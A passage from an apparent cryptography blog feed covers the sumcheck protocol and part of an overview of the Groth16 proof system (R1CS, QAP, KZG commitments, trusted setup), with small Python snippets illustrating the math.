$f(0, 0, 0, 0, 0, 0, 1, 0) = v_2$&lt;br &#x2F;&gt;
$f(0, 0, 0, 0, 0, 0, 1, 1) = v_3$&lt;br &#x2F;&gt;
$\vdots$&lt;br &#x2F;&gt;
$f(1, 1, 1, 1, 1, 1, 1, 1) = v_{255}$&lt;br &#x2F;&gt;
In general form, we assign to a tuple $(x_0, x_1, … x_{m - 1} )$ the value corresponding to index $k = x_0 + 2 x_1 + 4x_2 + \dots + 2^{m - 1} x_{ m - 1 }$. Then, we can use the fact that the multilinear extension of $f$ exists and create it by Lagrange interpolation, for example. Thus,&lt;br &#x2F;&gt;
$p(x_0 , x_1 , … x_{m - 1} ) = \sum_{ k = 0 }^{ 2^m - 1 } f(k) B_k (x_0 , x_1 , … , x_{ m - 1} )$&lt;br &#x2F;&gt;
where $B_k$ is the Lagrange basis polynomial, which equals one when $(x_0 , x_1 , … , x_{ m -1 })$ corresponds to the binary representation of $k$ and zero otherwise. If we represent $k = (k_0, k_1 , … k_{ m - 1})$ (remember each $k_i$ is either 0 or 1), the function $B_k(x_0, x_1, … x_{ m - 1 })$ has the explicit expression&lt;br &#x2F;&gt;
$B_k (x_0 , x_1 , …, x_{ m - 1}) = \prod_i ( x_i k_i + (1 - x_i ) (1 - k_i))$&lt;&#x2F;p&gt;
&lt;p&gt;For example, if we have the vector $v = ( 2, 5, 7, 8)$, we have four Lagrange basis polynomials:&lt;br &#x2F;&gt;
$B_0 (x_0 , x_1 ) = (1 - x_0) (1 - x_1 ) = 1 - x_1 - x_0 + x_1 x_0$&lt;br &#x2F;&gt;
$B_1 (x_0 , x_1 ) = x_0 (1 - x_1 ) = x_0 - x_0 x_1$&lt;br &#x2F;&gt;
$B_2 (x_0 , x_1 ) = (1 - x_0 ) x_1 = x_1 - x_0 x_1$&lt;br &#x2F;&gt;
$B_3 (x_0 , x_1 ) = x_0 x_1$&lt;br &#x2F;&gt;
and&lt;br &#x2F;&gt;
$p(x_0 , x_1) = 2 B_0 + 5 B_1 + 7 B_2 + 8 B_3$&lt;br &#x2F;&gt;
Replacing everything,&lt;br &#x2F;&gt;
$p(x_0 , x_1) = 2 + 3 x_0 + 5 x_1 - 2 x_0 x_1$&lt;&#x2F;p&gt;
&lt;p&gt;This way, we have encoded our vector as a multilinear polynomial in two variables. We could generally encode a vector of length $n$ as a polynomial in $\lceil{\log_2 (n)} \rceil$ variables. We can then use this encoding to reduce the validity of some calculation to the sum of this polynomial over all possible values of $x_0 , x_1 , … , x_{ m - 1 }$.&lt;&#x2F;p&gt;
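The worked example above can be checked mechanically. The following Python sketch (helper names are our own, not taken from any library) builds the multilinear extension of $v = (2, 5, 7, 8)$ from the Lagrange basis polynomials and confirms the closed form:

```python
# Multilinear extension of v = (2, 5, 7, 8); helper names are illustrative.

def lagrange_basis(k, x):
    """B_k(x) = prod_i (x_i * k_i + (1 - x_i) * (1 - k_i)), k_i the bits of k."""
    result = 1
    for i, x_i in enumerate(x):
        k_i = (k >> i) & 1
        result *= x_i * k_i + (1 - x_i) * (1 - k_i)
    return result

def multilinear_extension(v):
    def p(*x):
        return sum(v_k * lagrange_basis(k, x) for k, v_k in enumerate(v))
    return p

p = multilinear_extension([2, 5, 7, 8])

# p agrees with v on {0,1}^2 under the index k = x_0 + 2*x_1 ...
assert [p(k & 1, k >> 1) for k in range(4)] == [2, 5, 7, 8]

# ... and matches the closed form 2 + 3*x_0 + 5*x_1 - 2*x_0*x_1 everywhere.
assert all(p(a, b) == 2 + 3*a + 5*b - 2*a*b for a in range(4) for b in range(4))
```

For simplicity the sketch works over the integers; in practice the arithmetic would be carried out in a finite field.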
&lt;h2 id=&quot;the-sumcheck-protocol&quot;&gt;The sumcheck protocol&lt;&#x2F;h2&gt;
&lt;p&gt;The sumcheck protocol is an interactive proof introduced in 1992 with a fundamental role in the theory of probabilistic proofs in complexity theory and cryptography, leading to the construction of succinct arguments. One of its essential properties is that the prover can be implemented in a number of operations that scale linearly (that is, its running time is $\mathcal{O} (n)$), which has a better asymptotic complexity than algorithms based on the Fast Fourier Transform ($\mathcal{O} (n \log n)$). It also provides the basis for folding techniques for Pedersen commitments in the discrete logarithm setting. For an in-depth explanation of the protocol, look at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;people.cs.georgetown.edu&#x2F;jthaler&#x2F;ProofsArgsAndZK.pdf&quot;&gt;proofs, arguments and zero-knowledge&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2021&#x2F;333.pdf&quot;&gt;sumcheck arguments and their applications&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;The sumcheck protocol yields an interactive proof for statements of the form&lt;br &#x2F;&gt;
$$\sum_{ x \in H^m } p(x) = S$$&lt;br &#x2F;&gt;
that is, the sum of all the evaluations of an $m$-variate polynomial over a domain equals $S$. The prover is given the polynomial $p(x)$; the verifier sends the prover random challenges $r_k$ from a set $\mathcal{C}$ and receives univariate polynomials $q_k(x)$, which allow the verifier to be convinced that the statement is true. The protocol reduces the workload of the verifier from evaluating the $m$-variate polynomial over all of $H^m$ (for example, if the size of $H$, $\vert H\vert$, is two and we have 16 variables, we need to do $2^{16}$ evaluations) to a single evaluation at a random point in $\mathbb{F}^m$, plus some additional smaller operations.&lt;&#x2F;p&gt;
&lt;p&gt;The protocol proceeds in rounds and works as follows:&lt;&#x2F;p&gt;
&lt;p&gt;1. For each round $k = 1, 2, …, m$, the prover sends to the verifier the polynomial&lt;br &#x2F;&gt;
$$q_k (x) = \sum_{ a_j \in H , j \geq k + 1 } p(r_1, r_2, …, r_{ k - 1 }, x, a_{ k + 1}, … a_{m})$$&lt;br &#x2F;&gt;
2. The verifier checks that $\sum_{a_1 \in H} q_1 (a_1) = S$ and, for $k = 2, …, m$, that $\sum_{a_k \in H} q_k ( a_k ) = q_{ k - 1 }( r_{k - 1})$, sending the random challenge $r_k$ after each round.&lt;br &#x2F;&gt;
3. If all checks pass, the verifier computes $v = q_m ( r_m )$ and outputs $r_1 , r_2 , …, r_m , v$; it remains to check, with a single evaluation, that $p(r_1 , …, r_m ) = v$.&lt;&#x2F;p&gt;
&lt;p&gt;Let’s explain the protocol in simple terms. In the first round, the prover sends the verifier a polynomial $q_1 (x_1 )$ by summing over all possible values of the rest of the variables. This way, the verifier can check the sum by evaluating the polynomial $q_1 (x_1)$ over all its values, which is much faster than summing over all the variables. However, how does the verifier know that the prover did not cheat and send some fake polynomial $q_1 (x_1)$? The verifier sends a random challenge $r_1$, and the prover responds with a new polynomial of one variable, $q_2 (r_1, x_2)$, which is obtained by fixing the first coordinate and summing over all the other variables except $x_2$. If we evaluate $q_1 (r_1 )$, we should get the same as adding over all possible values of $q_2 (x_2 )$ (because $q_1$ was obtained by summing over all values of $x_2$). The verifier always has to do a few evaluations of a univariate polynomial.&lt;&#x2F;p&gt;
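The round structure described above can be simulated end to end. The following Python sketch runs the protocol for a small 3-variable polynomial over $H = \{0, 1\}$; the honest prover is computed by brute force, and all names and parameters are illustrative:

```python
import random
from itertools import product

# Toy interactive run of the sumcheck protocol; names are illustrative.

def p(x1, x2, x3):
    return 2 * x1 * x2 + x3 + 5 * x1 * x3  # example polynomial

m, H = 3, [0, 1]
S = sum(p(*a) for a in product(H, repeat=m))  # claimed sum

def make_q(k, rs):
    """Round-k polynomial: fix r_1..r_{k-1}, keep x free, sum over the tail."""
    def q(x):
        return sum(p(*(rs + [x] + list(a))) for a in product(H, repeat=m - k))
    return q

rs, prev = [], None
for k in range(1, m + 1):
    q_k = make_q(k, rs)
    # Verifier: the sum of q_k over H must match the previous claim.
    total = sum(q_k(a) for a in H)
    assert total == (S if k == 1 else prev), "sumcheck round failed"
    r_k = random.randint(0, 10**6)   # random challenge from a large set
    prev = q_k(r_k)
    rs.append(r_k)

# Final check: a single evaluation of p at the random point (r_1, r_2, r_3).
assert p(*rs) == prev
```

The prover here re-sums the whole hypercube each round, which is exponentially wasteful; real implementations reuse partial evaluations to reach the linear-time bound mentioned above.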
&lt;p&gt;If the challenge subset $\mathcal{C}$ is a sampling subset, then the sumcheck protocol satisfies:&lt;&#x2F;p&gt;
&lt;p&gt;a. Completeness.&lt;br &#x2F;&gt;
b. Soundness, where the soundness error is bounded by $m d&#x2F; \vert \mathcal{C} \vert$ ($m$ is the number of variables, $d$ the maximum individual degree in the polynomial, and $\vert \mathcal{C} \vert$ the number of elements in the challenge subset).&lt;&#x2F;p&gt;
&lt;p&gt;In many cases, we would like to work with $H^m = \{ 0,1 \}^m$, so that $x = (x_1 , x_2 , … , x_m)$ is the collection of all bitstrings of length $m$ and we can use the encoding for vectors as multilinear polynomials.&lt;&#x2F;p&gt;
&lt;p&gt;To make the sumcheck protocol zero-knowledge, we need to mask the polynomial. We can achieve this by adding a random polynomial.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;In this post, we covered the sumcheck protocol, which is at the heart of some SNARKs. It allows the verifier to check that the sum of the evaluations of some multivariate polynomial over a set is equal to some number by delegating most of the computational burden to the prover. The protocol involves a number of rounds equal to the number of variables, where the prover sends at each round a univariate polynomial, and the verifier responds by sending a random challenge. The verifier’s highest cost is involved in evaluating the multivariate at one random point, significantly less than trivial verification. In an upcoming post, we will cover how to implement the sumcheck protocol from scratch.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>An overview of the Groth16 proof system</title>
          <pubDate>Tue, 17 Oct 2023 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/groth16/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/groth16/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/groth16/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Over the last decade, SNARKs (succinct, non-interactive arguments of knowledge) and STARKs (scalable, transparent arguments of knowledge) have been gaining attention due to their applications in verifiable private computation and scalability of blockchains.&lt;&#x2F;p&gt;
&lt;p&gt;Groth introduced this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2016&#x2F;260.pdf&quot;&gt;proof system&lt;&#x2F;a&gt; in 2016, and it saw an early application in Zcash. The protocol relies on pairing-friendly elliptic curves, such as BN254, BLS12-381, and BLS12-377 (more on these later). Its proof size is among the smallest (consisting of only three elliptic curve elements) and fastest to verify. The main drawback is that it needs a trusted setup per program. In other words, we need to regenerate all the parameters whenever we want to prove a new program (or change the original one).&lt;&#x2F;p&gt;
&lt;p&gt;In this post, we will describe the main ingredients of Groth16 and how it works. As stated in the roadmap, we are implementing the protocol in the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&quot;&gt;Lambdaworks library&lt;&#x2F;a&gt;. It is also used as a project in the ongoing &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;sparkling_water_bootcamp&#x2F;tree&#x2F;main&quot;&gt;Sparkling Water Bootcamp&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;arithmetization&quot;&gt;Arithmetization&lt;&#x2F;h2&gt;
&lt;p&gt;To prove the execution of a given program, we have to transform it to a SNARK (succinct, non-interactive argument of knowledge) friendly form. One of such forms is arithmetic circuit satisfiability, where one can prove knowledge of a valid circuit assignment. This first step, known as arithmetization, is the program’s transformation into an arithmetic circuit or equivalent form.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;r1cs&quot;&gt;R1CS&lt;&#x2F;h2&gt;
&lt;p&gt;Arithmetic circuits can be expressed equivalently as (quadratic) rank one constraint systems (R1CS), which are systems of equations of the form:&lt;br &#x2F;&gt;
$$(Az)\times (Bz) = Cz$$&lt;br &#x2F;&gt;
where $A, B, C$ are matrices of size $m + 1$ rows by $n + 1$ columns, $z$ is a (column) vector of size $n + 1$ and $\times$ indicates the componentwise product of the resulting vectors.&lt;&#x2F;p&gt;
&lt;p&gt;We can alternatively view this compact form as&lt;br &#x2F;&gt;
$\left( \sum_k a_{0k} z_k \right) \left( \sum_k b_{0k} z_k \right) - \left( \sum_k c_{0k} z_k \right) = 0$&lt;br &#x2F;&gt;
$\left( \sum_k a_{1k} z_k \right) \left( \sum_k b_{1k} z_k \right) - \left( \sum_k c_{1k} z_k \right) = 0$&lt;br &#x2F;&gt;
$\left( \sum_k a_{2k} z_k \right) \left( \sum_k b_{2k} z_k \right) - \left( \sum_k c_{2k} z_k \right) = 0$&lt;br &#x2F;&gt;
$\vdots$&lt;br &#x2F;&gt;
$\left( \sum_k a_{mk} z_k \right) \left( \sum_k b_{mk} z_k \right) - \left( \sum_k c_{mk} z_k \right) = 0$&lt;&#x2F;p&gt;
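As a quick sanity check of the relation above, the following Python sketch verifies the componentwise product for a hypothetical one-constraint system encoding $x \cdot x = y$ (the matrices and assignment are our own toy example):

```python
# Minimal numeric check of the componentwise R1CS relation (Az) x (Bz) = Cz.
# The single constraint below encodes x * x = y (an illustrative toy system).

A = [[0, 1, 0]]   # selects x from z
B = [[0, 1, 0]]   # selects x from z
C = [[0, 0, 1]]   # selects y from z
z = [1, 3, 9]     # z = (1, public input x = 3, witness y = 9)

def matvec(M, v):
    return [sum(m * v_j for m, v_j in zip(row, v)) for row in M]

Az, Bz, Cz = matvec(A, z), matvec(B, z), matvec(C, z)
hadamard = [a * b for a, b in zip(Az, Bz)]   # componentwise product
assert hadamard == Cz   # the assignment satisfies the constraint system
```

Changing the witness to any value other than 9 makes the assertion fail, which is exactly the condition the proof system must enforce.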
&lt;p&gt;We could express these equations more compactly by using polynomials and prove the solution of the R1CS system more concisely. To this end, we will introduce quadratic arithmetic programs, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;vitalik.ca&#x2F;general&#x2F;2016&#x2F;12&#x2F;10&#x2F;qap.html&quot;&gt;QAP&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;quadratic-arithmetic-program&quot;&gt;Quadratic Arithmetic Program&lt;&#x2F;h2&gt;
&lt;p&gt;We can interpret each column of the $A$ matrix as evaluations of some polynomial over some suitable domain. This is a common practice in many SNARKs, where we try to encode a vector as a polynomial; see, for example, our &lt;a href=&quot;&#x2F;diving-deep-fri&#x2F;&quot;&gt;post about STARKs&lt;&#x2F;a&gt;. We sample $D_0 = \{ x_0 , x_1 , … , x_n \}$ over the finite field and define the polynomial $A_i (x)$ as the polynomial of at most degree $n$ such that $A_i ( x_k ) = a_{ki}$.&lt;&#x2F;p&gt;
&lt;p&gt;For performance reasons, it is convenient to select as interpolation domain $D_0$ the n-th roots of unity since we can use the Fast Fourier Transform to interpolate. Similarly, we can interpret the columns of $B$ and $C$ as polynomials $B_k (x)$ and $C_k (x)$. Taking advantage of these polynomials, we can express the R1CS system in polynomial form,&lt;br &#x2F;&gt;
$P (x) = \left( \sum_k A_{k} (x) z_k \right) \left( \sum_k B_{k} (x) z_k \right) - \left( \sum_k C_{k} (x) z_k \right)$&lt;&#x2F;p&gt;
&lt;p&gt;We can see that if we have a valid solution for the R1CS, the polynomial $P (x)$ evaluates to $0$ over $D_0$ (since we require the polynomial to interpolate the values of the columns of the matrices). Therefore, we can express the condition as&lt;br &#x2F;&gt;
$P (x) = 0$ for $x \in D_0$&lt;br &#x2F;&gt;
We now introduce the vanishing polynomial over the set $D_0$, $Z_D (x) = \prod_k (x - x_k )$&lt;br &#x2F;&gt;
So, if the polynomial $P (x)$ evaluates to $0$ over $D_0$, it is divisible by $Z_D (x)$; that is, there is some polynomial $h (x)$ such that&lt;br &#x2F;&gt;
$P (x) = h(x) Z_D (x)$&lt;br &#x2F;&gt;
The degree of the polynomial $h(x)$ is the degree of $P$ minus the degree of $Z_D$. An honest prover should be able to find the resulting quotient and use it to show that he correctly executed the program.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;transforming-qap-into-a-zero-knowledge-proof&quot;&gt;Transforming QAP into a zero-knowledge proof&lt;&#x2F;h2&gt;
&lt;p&gt;We need to make some transformation to the above problem if we want to turn it into a zero-knowledge proof. For a more detailed description of this process, see &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.rareskills.io&#x2F;post&#x2F;groth16&quot;&gt;here&lt;&#x2F;a&gt;. We must ensure that the prover cannot cheat and that the verifier cannot learn anything about the private input or witness. One key ingredient is a polynomial commitment scheme (PCS): we can make the prover commit to a given polynomial so that he cannot change it later. One such commitment scheme is the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;dankradfeist.de&#x2F;ethereum&#x2F;2020&#x2F;06&#x2F;16&#x2F;kate-polynomial-commitments.html&quot;&gt;KZG commitment&lt;&#x2F;a&gt;, where we use &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;static1.squarespace.com&#x2F;static&#x2F;5fdbb09f31d71c1227082339&#x2F;t&#x2F;5ff394720493bd28278889c6&#x2F;1609798774687&#x2F;PairingsForBeginners.pdf&quot;&gt;pairing-friendly elliptic curves&lt;&#x2F;a&gt; to bind the prover to a polynomial. The scheme’s security relies on the hardness of the discrete logarithm problem over the curve. Pairings can be considered an operation that allows a one-time multiplication between points in an elliptic curve. In our case, we will work over type III pairings, $\dagger : G_1 \times G_2 \rightarrow G_t$, which have the following nice property (bilinearity):&lt;br &#x2F;&gt;
$(a g_1 ) \dagger (b g_2 ) = (ab) (g_1 \dagger g_2)$&lt;br &#x2F;&gt;
To commit to a polynomial using KZG, we need to sample a random scalar $\tau$ (which is considered toxic waste and should be forgotten, or we could forge proofs) and generate the following sequence of points in the elliptic curve, whose generator is $g_1$,&lt;br &#x2F;&gt;
$P_0 = g_1$,&lt;br &#x2F;&gt;
$P_1 = \tau g_1$&lt;br &#x2F;&gt;
$P_2 = \tau^2 g_1$&lt;br &#x2F;&gt;
$\vdots$&lt;br &#x2F;&gt;
$P_n = \tau^n g_1$&lt;br &#x2F;&gt;
Then, given a polynomial $p(x) = a_0 + a_1 x + a_2 x^2 + … + a_n x^n$ we compute the commitment as&lt;br &#x2F;&gt;
$\mathrm{cm} (p) = a_0 P_0 + a_1 P_1 + … + a_n P_n$&lt;br &#x2F;&gt;
which is the same as $\mathrm{cm} (p) = p(\tau) g_1$, that is, hiding the evaluation of $p(x)$ inside the elliptic curve. Because the discrete log problem is hard, we cannot use our knowledge of $g_1$ and $\mathrm{cm} (p)$ to obtain $p(\tau)$.&lt;&#x2F;p&gt;
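The linear structure of the commitment can be illustrated by swapping the elliptic-curve group for the additive group of integers modulo a prime. This toy sketch is completely insecure (discrete logarithms are trivial here) and every parameter is made up; it only shows that the commitment equals $p(\tau) g_1$:

```python
# Toy illustration of the KZG commitment structure; structure only, no security.
r = 2**31 - 1            # stand-in group order (hypothetical parameter)
g1 = 5                   # stand-in generator
tau = 123456             # toxic waste: must be discarded after the setup

# Setup: the points P_i = tau^i * g1, published without revealing tau.
n = 4
P = [pow(tau, i, r) * g1 % r for i in range(n + 1)]

# Commit to p(x) = 7 + 3x + x^3 using only the setup points.
coeffs = [7, 3, 0, 1, 0]
cm = sum(a * P_i for a, P_i in zip(coeffs, P)) % r

# The commitment equals p(tau) * g1: the evaluation of p at tau, "hidden" in
# the group (here nothing is actually hidden, since discrete logs are easy).
p_tau = sum(a * pow(tau, i, r) for i, a in enumerate(coeffs)) % r
assert cm == p_tau * g1 % r
```

In a real instantiation, `P` would be elliptic curve points and the sum a multi-scalar multiplication, so the committer never learns $\tau$ or $p(\tau)$.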
&lt;p&gt;To check that the polynomial $p(x)$ evaluates to $v$ at $z$ we can use the fact that&lt;br &#x2F;&gt;
$p(x) - v = (x - z)q(x)$&lt;br &#x2F;&gt;
where $q(x)$ is the quotient polynomial of the division of $p(x)$ by $x - z$. The prover can produce proof of such evaluation by committing to $q(x)$ using the same trick. Still, the verifier will need some additional information (included in the verifying key), $g_2$ (the generator of the group $G_2$), and $\tau g_2$ (remember, nobody must know $\tau$). Then, using pairings, the verifier can check the evaluation using the points in the elliptic curves,&lt;br &#x2F;&gt;
$(\mathrm{cm} (p) - v g_1 ) \dagger g_2 = a = (p(\tau) - v) (g_1 \dagger g_2)$&lt;br &#x2F;&gt;
$\mathrm{cm} (q) \dagger (\tau g_2 - z g_2) = b = q(\tau) ( \tau - z)(g_1 \dagger g_2)$&lt;br &#x2F;&gt;
If $a$ and $b$ coincide then, since $\tau$ is a random point, with high probability $p(z) = v$ (this follows from the Schwartz-Zippel lemma).&lt;&#x2F;p&gt;
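The division trick behind the opening proof can be checked numerically. The sketch below (toy modulus and illustrative names, ours rather than any library's) divides $p(x)$ by $x - z$ with synthetic division and verifies the identity that the pairing check encodes:

```python
# Numeric check of the opening identity p(x) - v = (x - z) q(x), mirroring the
# pairing equation over a toy prime modulus.
M = 2**31 - 1  # prime modulus standing in for the scalar field

def divide_by_linear(coeffs, z):
    """Divide p(x) by (x - z) via synthetic division.
    Returns (quotient coefficients low-to-high, remainder)."""
    acc, out = 0, []
    for c in reversed(coeffs):       # process from the highest degree down
        acc = (acc * z + c) % M
        out.append(acc)
    remainder = out.pop()            # the last value is p(z)
    return out[::-1], remainder

p_coeffs = [7, 3, 0, 1]              # p(x) = 7 + 3x + x^3
z = 11
v = (7 + 3 * z + z**3) % M           # v = p(z) = 1371

quot, rem = divide_by_linear(p_coeffs, z)
assert rem == v                      # remainder of p(x) / (x - z) equals p(z)

def ev(cs, x):
    return sum(c * pow(x, i, M) for i, c in enumerate(cs)) % M

# The verifier's pairing check compares (p(tau) - v) with q(tau) * (tau - z);
# here both sides can be evaluated directly at a point tau.
tau = 987654
assert (ev(p_coeffs, tau) - v) % M == ev(quot, tau) * (tau - z) % M
```

In the actual scheme both sides live inside the target group $G_t$, so the verifier performs this comparison with two pairings instead of field arithmetic.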
&lt;p&gt;Remember that we want to prove that the prover knows some $w$ and a polynomial $h(x)$ of degree $m - 1$ such that if $z= (1, x, w)$, the following condition holds&lt;br &#x2F;&gt;
$\left( \sum_k A_{k} (x) z_k \right) \left( \sum_k B_{k} (x) z_k \right) = \left( \sum_k C_{k} (x) z_k \right) + h(x)Z_D (x)$&lt;&#x2F;p&gt;
&lt;p&gt;If we force the prover first to commit to the polynomials $A_k (x)$ and $B_k (x)$ and then produce the quotient polynomial, we have to make sure that he cannot forge $C_k (x)$ to fulfill the previous condition. To do so, we are going to introduce random shifts ($\alpha$ and $\beta$) to the evaluations:&lt;br &#x2F;&gt;
$\mathrm{cm} (\sum A_i z_i ) = \sum (A_i (\tau) z_i) g_1 + \alpha g_1$&lt;br &#x2F;&gt;
$\mathrm{cm} (\sum B_i z_i) = \sum (B_i (\tau) z_i) g_2 + \beta g_2$&lt;br &#x2F;&gt;
The $B_i (x)$ are committed to using group $G_2$ so that we can compute the product on the left-hand side through a pairing,&lt;br &#x2F;&gt;
$(\mathrm{cm} (\sum A_i z_i )) \dagger ( \mathrm{cm} (\sum B_i z_i )) = (\sum A_i (\tau) z_i )(\sum B_i (\tau) z_i ) (g_1 \dagger g_2)$&lt;&#x2F;p&gt;
&lt;p&gt;Because we introduce these shifts, we need to modify the $C_k$ term accordingly,&lt;br &#x2F;&gt;
$\begin{equation}\left( \alpha + \sum_k A_{k} (x) z_k \right) \left( \beta + \sum_k B_{k} (x) z_k \right) = \ \alpha \beta + \left( \sum_k (C_{k} (x) + \beta A_k (x) + \alpha B_k (x)) z_k \right) + h(x)Z_D (x) \end{equation}$&lt;br &#x2F;&gt;
Since the prover cannot know $\alpha$ and $\beta$, we need to provide them hidden as part of the trusted setup, as $\alpha g_1$ and $\beta g_2$, so that we can compute&lt;br &#x2F;&gt;
$(\alpha g_1) \dagger (\beta g_2) = \alpha \beta (g_1 \dagger g_2)$&lt;br &#x2F;&gt;
so that we can compare this result to the pairing between the shifted $A_i$ and $B_i$.&lt;&#x2F;p&gt;
&lt;p&gt;Also, since the prover does not have $\alpha$ and $\beta$, he needs to be supplied with all the elements of the form $C_{k} (x) + \beta A_k (x) + \alpha B_k (x)$. However, when we want to calculate the product between these terms and $z$, we must recall that $z$ contains both the public input and the witness. The verifier cannot learn anything about the witness (therefore, the evaluations involving the witness should be provided by the prover). We introduce two additional variables, $\gamma$, and $\delta$, to split the variable $z$ between public input and witness. The first $k$ terms correspond to the public input, and these are encoded as&lt;br &#x2F;&gt;
$K_i^v = \gamma^{- 1} (C_{i} (\tau) + \beta A_i (\tau) + \alpha B_i (\tau)) g_1$&lt;br &#x2F;&gt;
for $i = 0, 1, 2 … , k$. For the witness, we have&lt;br &#x2F;&gt;
$K_i^p = \delta^{- 1} (C_{i} (\tau) + \beta A_i (\tau) + \alpha B_i (\tau)) g_1$&lt;br &#x2F;&gt;
With these new parameters, we get&lt;br &#x2F;&gt;
$\begin{equation}\left( \alpha + \sum_j A_{j} (x) z_j \right) \left( \beta + \sum_j B_{j} (x) z_j \right) = \ \alpha \beta + \gamma \left( \sum_{i = 0}^k \gamma^{- 1} (C_{i} (x) + \beta A_i (x) + \alpha B_i (x)) z_i \right) + \delta \left( \sum_{i = k + 1}^n \delta^{- 1} (C_{i} (x) + \beta A_i (x) + \alpha B_i (x)) z_i \right) + h(x)Z_D (x) \end{equation}$&lt;br &#x2F;&gt;
We can combine the last two terms into one (since they contain all the information that the verifier must not learn)&lt;br &#x2F;&gt;
$D = \left( \sum_{i = k + 1}^n \delta^{- 1} (C_{i} (x) + \beta A_i (x) + \alpha B_i (x)) z_i \right) + h(x)Z_D (x)\delta^{- 1}$&lt;&#x2F;p&gt;
&lt;p&gt;Since we want to compute the product $h(x) Z_D(x)$ with the help of one pairing, we can compute the following group elements,&lt;br &#x2F;&gt;
$Z_0 = \delta^{ - 1} Z_D (\tau)$&lt;br &#x2F;&gt;
$Z_1 = \delta^{ - 1} \tau Z_D (\tau)$&lt;br &#x2F;&gt;
$Z_2 = \delta^{ - 1} \tau^2 Z_D (\tau)$&lt;br &#x2F;&gt;
$\vdots$&lt;br &#x2F;&gt;
$Z_{m - 1} = \delta^{ - 1} \tau^{ m - 1 } Z_D (\tau)$&lt;&#x2F;p&gt;
&lt;p&gt;With these changes, the right-hand side of the QAP is the sum of 3 terms:&lt;br &#x2F;&gt;
A constant (related to the random shifts).&lt;br &#x2F;&gt;
A term involving the public input.&lt;br &#x2F;&gt;
A term that contains the secret terms (known only to the prover).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;setup&quot;&gt;Setup&lt;&#x2F;h2&gt;
&lt;p&gt;Groth16 requires sampling five random field elements, $t, \alpha, \beta, \gamma, \delta$ (here $t$ plays the role of $\tau$ above), to generate the proving and verifying keys. These are toxic waste and should be discarded and wholly forgotten once the keys have been generated.&lt;&#x2F;p&gt;
&lt;p&gt;We will use a pairing-friendly elliptic curve (with type III pairing), with subgroups $G_1$ and $G_2$ of prime order $r$. We will call the generators $g_1$ and $g_2$, respectively. To make notation easier, we will write&lt;br &#x2F;&gt;
$[x]_1 = x g_1$&lt;br &#x2F;&gt;
$[x]_2 = x g_2$&lt;br &#x2F;&gt;
to denote points in $G_1$ and $G_2$, where $x g$ means the scalar product of $x$ and the generator of the group (i.e., applying x times the elliptic curve group operation to the generator). We will follow the notation given by &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2018&#x2F;691.pdf&quot;&gt;DIZK&lt;&#x2F;a&gt;. First, we compute the following vectors,&lt;br &#x2F;&gt;
$K_i^v (t) = \gamma^{-1} \left( \beta A_i(t) + \alpha B_i (t) + C_i (t)\right)$&lt;br &#x2F;&gt;
for $i = 0, 1, 2 , … k$,&lt;br &#x2F;&gt;
$K_i^p (t) = \delta^{-1} \left( \beta A_i(t) + \alpha B_i (t) + C_i (t)\right)$&lt;br &#x2F;&gt;
for $i = k + 1, k + 2 , … , n$, and&lt;br &#x2F;&gt;
$Z_k (t) = t^k Z_D (t) \delta^{-1}$&lt;br &#x2F;&gt;
for $k = 0, 1, 2, … m - 1$.&lt;br &#x2F;&gt;
The proving key consists of the following elements:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. $[\alpha]_1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. $[\beta]_1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. $[\beta]_2$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. $[\delta]_1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    5. $[\delta]_2$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    6. $[A_0 (t) ]_1, [A_1 (t) ]_1 , ... , [A_n (t) ]_1$&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
